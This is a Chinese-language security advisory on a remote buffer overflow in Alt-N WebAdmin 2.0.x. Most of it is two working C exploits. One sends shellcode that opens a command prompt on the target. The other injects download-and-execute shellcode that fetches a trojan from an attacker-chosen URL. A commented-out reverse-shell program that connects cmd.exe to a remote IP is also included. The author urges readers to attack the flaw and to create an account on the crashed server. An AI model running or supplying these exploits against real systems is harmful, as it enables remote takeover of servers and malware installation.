Alt-N WebAdmin USER参数远程缓冲区溢出漏洞发布时间:2003-06-24 更新时间:2003-06-25 严重程度:高 威胁程度:远程管理员权限 错误类型:边界检查错误 利用方式:服务器模式 BUGTRAQ ID:8029 受影响系统 Alt-N WebAdmin 2.0 .0未影响系统 Alt-N WebAdmin 2.0.5详细描述 WebAdmin允许管理员安全的在线管理MDaemon, RelayFax, 和WorldClient。 在USER参数时存在一个溢出问题。默认webadmin.exe进程以系统服务进程运行,由于对用户提交的USER参数缺少检查,超长用户名可出发溢出,精心提交用户数据可以以系统服务进程运行任意代码。 测试代码 /* WebAdmin.dll remote proof of concept 2.0.4 version.. tried finding 2.0.5 but all versions were already patched from the dl sites... this was tested on a win2ksp2 server, i suggest using better shellcode this is just something i know works, just opens a cmd.exe prompt on the victim box. I imagine this won't be too much harder to exploit with 2.0.5 unpatched this took me about 1 hour to write and it was my first remote win32 exploit, thank you alt-n :D. word to Mark Litchfield for finding this, i suggest anyone who is interested in learning win32 exploitation download this and attempt to exploit it, it's easier than you think. shouts to innercircle you little kittens you.... -wire */ #include <winsock2.h> #include <stdio.h> #pragma comment(lib "ws2_32"); char sc[] = "\x55" // push ebp "\x8b\xec" // mov ebp, esp "\x53" // push ebx "\x56" // push esi "\x57" // push edi "\x8b\xe5" // mov esp, ebp "\x55" // push ebp "\x8b\xec" // mov ebp, esp "\x33\xff" // xor edi,edi "\x57" // push edi "\x57" // push edi "\xc6\x45\xf8\x6d" // mov byte ptr ss:[ebp-8],6d "\xc6\x45\xf9\x73" // mov byte ptr ss:[ebp-7],73 "\xc6\x45\xfa\x76" // mov byte ptr ss:[ebp-6],76 "\xc6\x45\xfb\x63" // mov byte ptr ss:[ebp-5],63 "\xc6\x45\xfc\x72" // mov byte ptr ss:[ebp-4],72 "\xc6\x45\xfd\x74" // mov byte ptr ss:[ebp-3],74 "\xb8\x54\xa2\xe8\x77" // mov eax,kernel32.loadlibraryA; "\x50" // push eax "\x8d\x45\xf8" // lea eax, dword ptr ss:[ebp-8] "\x50" // push eax "\xff\x55\xf4" // call dword ptr ss:[ebp-c] "\x58" // pop eax "\x58" // pop eax "\x58" // pop eax "\x33\xc0" // xor eax,eax "\x50" // push eax "\x50" // push eax "\xc6\x45\xf8\x63" // mov byte ptr ss:[ebp-8],63 "\xc6\x45\xf9\x6d" // mov byte ptr ss:[ebp-7],6d "\xc6\x45\xfa\x64" // mov byte ptr ss:[ebp-6],64 "\xc6\x45\xfb\x2e" // mov byte ptr ss:[ebp-5],2e "\xc6\x45\xfc\x65" // mov byte ptr ss:[ebp-4],65 "\xc6\x45\xfd\x78" // mov byte ptr ss:[ebp-3],78 "\xc6\x45\xfe\x65" // mov byte ptr ss:[ebp-2],65 "\xb8\x4a\x9B\x01\x78" // mov eax, 78019b4a;system() from msvcrt win2ksp2 "\x50" // push eax "\x8d\x45\xf8" // lea eax, dword ptr ss:[ebp-8] "\x50" // push eax "\xff\x55\xf4" // call dword ptr ss:[ebp-c] "\x83\xc4\x04" // add esp, 04h "\x5c" // pop esp "\xc3"; // ret we're done! struct sockaddr_in victim; int main(int argc, char **argv) { SOCKET s; WSADATA wsadata; int x; DWORD jmpesp = 0x1005d58d; // jmp esp from 2.0.4 webAdmin.dll... char exp_buf[5000]; char boom[] = "POST /WebAdmin.dll?View=Logon HTTP/1.1\r\n" "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n" "Accept-Language: en-us\r\n" "Content-Type: application/x-www-form-urlencoded\r\n" "Accept-Encoding: gzip, deflate\r\n" "User-Agent: Your Mom\r\n" "Host: sh0dan.org\r\n" "Content-Length: 395\r\n" "Connection: Keep-Alive\r\n" "Cache-Control: no-cache\r\n" "Cookie: User=test; Lang=en; Theme=Standard\r\n\r\nUser="; char o_args[] = "&Password=foo&languageselect=en&Theme=Heavy&Logon=Sign+In\r\n\r\n"; if (argc != 3) { fprintf(stderr, "WebAdmin from Alt-N 2.0.4 Remote Exploit Proof Of Concept\n"); fprintf(stderr, "Werd to Mark Litchfield for finding this easily exploited hole\n"); fprintf(stderr, "Usage: %s <victim> <port>\n", argv[0]); exit(1); } WSAStartup(MAKEWORD(2,0),&wsadata); victim.sin_port = htons(atoi(argv[2])); victim.sin_addr.s_addr = inet_addr(argv[1]); victim.sin_family = AF_INET; memset(exp_buf, 0x90, 5000); x = strlen(boom); strncpy(exp_buf, boom, x); x += 168; memcpy(exp_buf+x, &jmpesp, 4); x += 4; memcpy(exp_buf+x, sc, strlen(sc)); x += strlen(sc); memcpy(exp_buf+x, o_args, strlen(o_args)); x += strlen(o_args); exp_buf[x+1] = 0x00; s = WSASocket(AF_INET,SOCK_STREAM,NULL,NULL,NULL,NULL); connect(s, (struct sockaddr *)&victim, sizeof(victim)); send(s, exp_buf, x, 0); printf("booyah"); return(0); } --------------------------------------------------------------------------- /* WebAdmin.dll remote download exec shellcode. Works on 2.0.3 and 2.0.4 all windows sp's. Oh and my previous exploit, i'm an idiot and 2.0.5 *is* the patch, heh. This shellcode was used by ThreaT in his vulnreg.reg exploit, it works quite nicely. Look at the bottom of the code for some trojan.exe idea's. That one i found somewhere but i can't remember. shellcode has one minor suck point, it shows a window on the target host, oh and the exploit crashes the server, so make a user account and restart the service. Be Kind. word to Mark Litchfield for finding this, i suggest anyone who is interested in learning win32 exploitation download this and attempt to exploit it, it's easier than you think. don't download directly from alt-n, they patched all of their 'archived' versions. heh. shouts to innercircle you little kittens you.... -wire */ #include <winsock2.h> #include <stdio.h> #define snprintf _snprintf // <-- a big fuck you to ms. #pragma comment(lib,"ws2_32") char sc[700] = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x68\x5E\x56\xC3\x90\x8B\xCC\xFF\xD1\x83\xC6\x0E\x90\x8B\xFE\xAC" "\x34\x99\xAA\x84\xC0\x75\xF8"// download and exec ala ThreaT vulnreg exploit. "\x72\xeb\xf3\xa9\xc2\xfd\x12\x9a\x12\xd9\x95\x12\xd1\x95\x12\x58\x12\xc5\xbd\x91" "\x12\xe9\xa9\x9a\xed\xbd\x9d\xa1\x87\xec\xd5\x12\xd9\x81\x12\xc1\xa5\x9a\x41\x12" "\xc2\xe1\x9a\x41\x12\xea\x85\x9a\x69\xcf\x12\xea\xbd\x9a\x69\xcf\x12\xca\xb9\x9a" "\x49\x12\xc2\x81\xd2\x12\xad\x03\x9a\x69\x9a\xed\xbd\x8d\x12\xaf\xa2\xed\xbd\x81" "\xed\x93\xd2\xba\x42\xec\x73\xc1\xc1\xaa\x59\x5a\xc6\xaa\x50\xff\x12\x95\xc6\xc6" "\x12\xa5\x16\x14\x9d\x9e\x5a\x12\x81\x12\x5a\xa2\x58\xec\x04\x5a\x72\xe5\xaa\x42" "\xf1\xe0\xdc\xe1\xd8\xf3\x93\xf3\xd2\xca\x71\xe2\x66\x66\x66\xaa\x50\xc8\xf1\xec" "\xeb\xf5\xf4\xff\x5e\xdd\xbd\x9d\xf6\xf7\x12\x75\xc8\xc8\xcc\x66\x49\xf1\xf0\xf5" "\xfc\xd8\xf3\x97\xf3\xeb\xf3\x9b\x71\xcc\x66\x66\x66\xaa\x42\xca\xf1\xf8\xb7\xfc" "\xe1\x5f\xdd\xbd\x9d\xfc\x12\x55\xca\xca\xc8\x66\xec\x81\xca\x66\x49\xaa\x42\xf1" "\xf0\xf7\xdc\xe1\xf3\x98\xf3\xd2\xca\x71\xb5\x66\x66\x66\x14\xd5\xbd\x89\xf3\x98" "\xc8\x66\x49\xaa\x42\xf1\xe1\xf0\xed\xc9\xf3\x98\xf3\xd2\xca\x71\x8b\x66\x66\x66" "\x66\x49\x71\xe6\x66\x66\x66"; struct sockaddr_in victim; int main(int argc, char **argv) { SOCKET s; WSADATA wsadata; int x; unsigned int i; DWORD jmpesp4 = 0x1005d58d; // jmp esp from 2.0.4 webAdmin.dll... DWORD jmpesp3 = 0x10071c43; // jmp esp from 2.0.3 webAdmin.dll... char exp_buf[5000]; char post[] = "POST /WebAdmin.dll?View=Logon HTTP/1.1\r\n" "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n" "Accept-Language: en-us\r\n" "Content-Type: application/x-www-form-urlencoded\r\n" "Accept-Encoding: gzip, deflate\r\n" "User-Agent: Your Mom\r\n" "Host: sh0dan.org\r\n"; char rest[] = "Connection: Keep-Alive\r\n" "Cache-Control: no-cache\r\n" "Cookie: User=test; Lang=en; Theme=Standard\r\n\r\nUser="; char o_args[] = "&Password=foo&languageselect=en&Theme=Heavy&Logon=Sign+In\r\n\r\n"; if (argc != 5) { fprintf(stderr, "WebAdmin from Alt-N remote LocalSystem exploit.\n"); fprintf(stderr, "Werd to Mark Litchfield for finding this easily exploited hole\n"); fprintf(stderr, "supports version 2.0.3 and 2.0.4 on any sp.\n"); fprintf(stderr, "Usage: %s <victim> <port> <url> <version> where version is 3 or 4\n", argv[0]); fprintf(stderr, "Ex: %s 192.168.0.1 1000 http://heh.com/trojan.exe 4\n", argv[0]); exit(1); } WSAStartup(MAKEWORD(2,0),&wsadata); victim.sin_port = htons(atoi(argv[2])); victim.sin_addr.s_addr = inet_addr(argv[1]); victim.sin_family = AF_INET; memset(exp_buf, 0x00, 5000); for (i = 0; i < strlen(argv[3]); argv[3][i++] ^=0x99); // xor our url. strncat(sc, argv[3], 100); // strcat the xor'd address onto sc. strncat(sc, "\x99", 1); // xor'd 00 snprintf(exp_buf, 2000, "%sContent-Length: %d\r\n%s", post, (strlen(sc)+strlen(rest)+168), rest); x = strlen(exp_buf); memset(exp_buf+x, 0x90, 168); x += 168; if(atoi(argv[4]) == 4) { memcpy(exp_buf+x, &jmpesp4, 4); x += 4; } else if (atoi(argv[4]) == 3) { memcpy(exp_buf+x, &jmpesp3, 4); x += 4; } else { fprintf(stderr, "uhm unknown version, try 3 or 4\n"); exit(1); } memcpy(exp_buf+x, sc, strlen(sc)); x += strlen(sc); memcpy(exp_buf+x, o_args, strlen(o_args)); x += strlen(o_args); exp_buf[x+1] = 0x00; s = WSASocket(AF_INET,SOCK_STREAM,NULL,NULL,NULL,NULL); if(connect(s, (struct sockaddr *)&victim, sizeof(victim)) < 0) { fprintf(stderr,"error couldn't connect\n"); exit(1); } send(s, exp_buf, x, 0); printf("sent!\n"); return(0); } /* ripped from somewhere, sorry i forget where i got this. #include <winsock2.h> #include <stdio.h> #pragma comment(lib,"ws2_32") #define PORT 53 #define IP 192.168.0.21 void main(int argc, char *argv[]) { WSADATA wsaData; SOCKET hSocket; STARTUPINFO si; PROCESS_INFORMATION pi; struct sockaddr_in adik_sin; memset(&adik_sin,0,sizeof(adik_sin)); memset(&si,0,sizeof(si)); WSAStartup(MAKEWORD(2,0),&wsaData); hSocket = WSASocket(AF_INET,SOCK_STREAM,NULL,NULL,NULL,NULL); adik_sin.sin_family = AF_INET; adik_sin.sin_port = htons(PORT); adik_sin.sin_addr.s_addr = inet_addr("IP"); connect(hSocket,(struct sockaddr*)&adik_sin,sizeof(adik_sin)); si.cb = sizeof(si); si.dwFlags = STARTF_USESTDHANDLES; si.hStdInput = si.hStdOutput = si.hStdError = (void *)hSocket; CreateProcess(NULL,"cmd",NULL,NULL,true,NULL,NULL,NULL,&si,&pi); ExitProcess(0); } */ 解决方案 升级程序: Alt-N WebAdmin 2.0 .0: Alt-N Upgrade WebAdmin 2.05 ftp://ftp.altn.com/WebAdmin/Release/wa205_en.exe Alt-N WebAdmin 2.0.1: Alt-N Upgrade WebAdmin 2.05 ftp://ftp.altn.com/WebAdmin/Release/wa205_en.exe Alt-N WebAdmin 2.0.2: Alt-N Upgrade WebAdmin 2.05 ftp://ftp.altn.com/WebAdmin/Release/wa205_en.exe Alt-N WebAdmin 2.0.3: Alt-N Upgrade WebAdmin 2.05 ftp://ftp.altn.com/WebAdmin/Release/wa205_en.exe Alt-N WebAdmin 2.0.4: Alt-N Upgrade WebAdmin 2.05 ftp://ftp.altn.com/WebAdmin/Release/wa205_en.exe 相关信息 参考:http://www.securityfocus.com/archive/1/326501 |
